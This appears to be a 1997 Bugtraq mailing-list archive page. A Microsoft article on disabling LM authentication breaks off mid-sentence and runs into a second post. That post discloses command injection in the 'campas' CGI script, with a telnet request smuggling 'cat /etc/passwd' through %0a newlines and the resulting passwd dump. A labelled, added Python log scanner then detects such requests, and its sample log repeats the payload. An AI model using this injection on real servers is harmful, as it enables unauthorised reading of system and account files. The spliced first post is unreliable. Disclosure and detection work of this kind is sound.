Bugtraq mailing list archives
new post SP3 hotfix: lm-fix
From: alex () DAN LV (Alex Libenson)
Date: Sat, 12 Jul 1997 21:16:01 +0300
ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/lm-fix

DOCUMENT:Q147706
TITLE:How to Disable LM Authentication on Windows NT
PRODUCT:Microsoft Windows NT, Windows 95, Windows for Workgroups 3.11 and LAN Manager 2.2c
PROD/VER:2.2 3.11 4.0 95
OPER/SYS:WINDOWS
KEYWORD:kberrmsg kbfile ntsecurity NTSrvWkst ntstop

--------------------------------------------------------------------------
The information in this article applies to:

 - Microsoft Windows NT Workstation version 4.0
 - Microsoft Windows NT Server version 4.0
 - Microsoft LAN Manager version 2.2c
 - Microsoft Windows for Workgroups version 3.11
 - Microsoft Windows 95
--------------------------------------------------------------------------

SUMMARY
=======

Windows NT supports the following two types of challenge/response
authentication:

 - LanManager (LM) challenge/response
 - Windows NT challenge/response

To allow access to servers that only support LM authentication, Windows NT
clients currently send both authentication types.
Microsoft developed a patch that supports a new registry

From: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO>
Date: Tue, 15 Jul 1997 18:24:31 -0500
Subject: Bug CGI campas
To: BUGTRAQ () NETSPACE ORG

CAMPAS SECURITY BUG
-------------------
ET Lownoise Colombia 1997

CGI: campas
  #!/bin/sh
  #pragma ident "@(#)campas.sh 1.2 95/05/24 NCSA"

Impact: Execute commands
Exploit:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... continue :P

Solution:
1-If u don't use it erase it.!
2-Don't use it again.. (go point 1)

Well another line to put in vito.ini.

ET LOwnoise 1997 Colombia
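
Added example, not part of the original post or of the campas script: a log check that flags CGI requests whose query string carries percent-encoded control characters, such as the %0a newlines in the request above. The log lines, the /cgi-bin/ prefix, the function names and the three-round decode limit are assumptions made for this sketch.

```python
import re
from urllib.parse import unquote_to_bytes

# Request field of a Common Log Format line; the protocol is optional (HTTP/0.9).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')
CONTROL_BYTES = re.compile(rb'[\x00-\x1f\x7f]')
MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap double encoding such as %250a


def control_bytes_in_query(target):
    """Return the sorted control byte values found in the decoded query string."""
    _, _, query = target.partition("?")
    data = query.encode("latin-1", "replace")
    found = set()
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_to_bytes(data)
        found.update(m.group()[0] for m in CONTROL_BYTES.finditer(decoded))
        if decoded == data:  # nothing left to decode
            break
        data = decoded
    return sorted(found)


def scan(lines, path_prefix="/cgi-bin/"):
    """Return (line_number, target, control_bytes) for each suspicious CGI request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m or not m.group("target").startswith(path_prefix):
            continue
        bad = control_bytes_in_query(m.group("target"))
        if bad:
            hits.append((n, m.group("target"), bad))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/1997:18:20:01 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 200 412',
    '192.0.2.11 - - [15/Jul/1997:18:21:07 -0500] "GET /cgi-bin/search?q=bugtraq+archive HTTP/1.0" 200 1033',
    '192.0.2.12 - - [15/Jul/1997:18:22:40 -0500] "GET /cgi-bin/campas?user=%250Atest HTTP/1.0" 200 57',
    '192.0.2.13 - - [15/Jul/1997:18:23:02 -0500] "GET /index.html?x=%0a HTTP/1.0" 200 2210',
]

if __name__ == "__main__":
    for n, target, bad in scan(SAMPLE_LOG):
        print(f"line {n}: {target} control bytes {[hex(b) for b in bad]}")
```

A hit only shows that the request was made; whether the script acted on it has to be checked on the host.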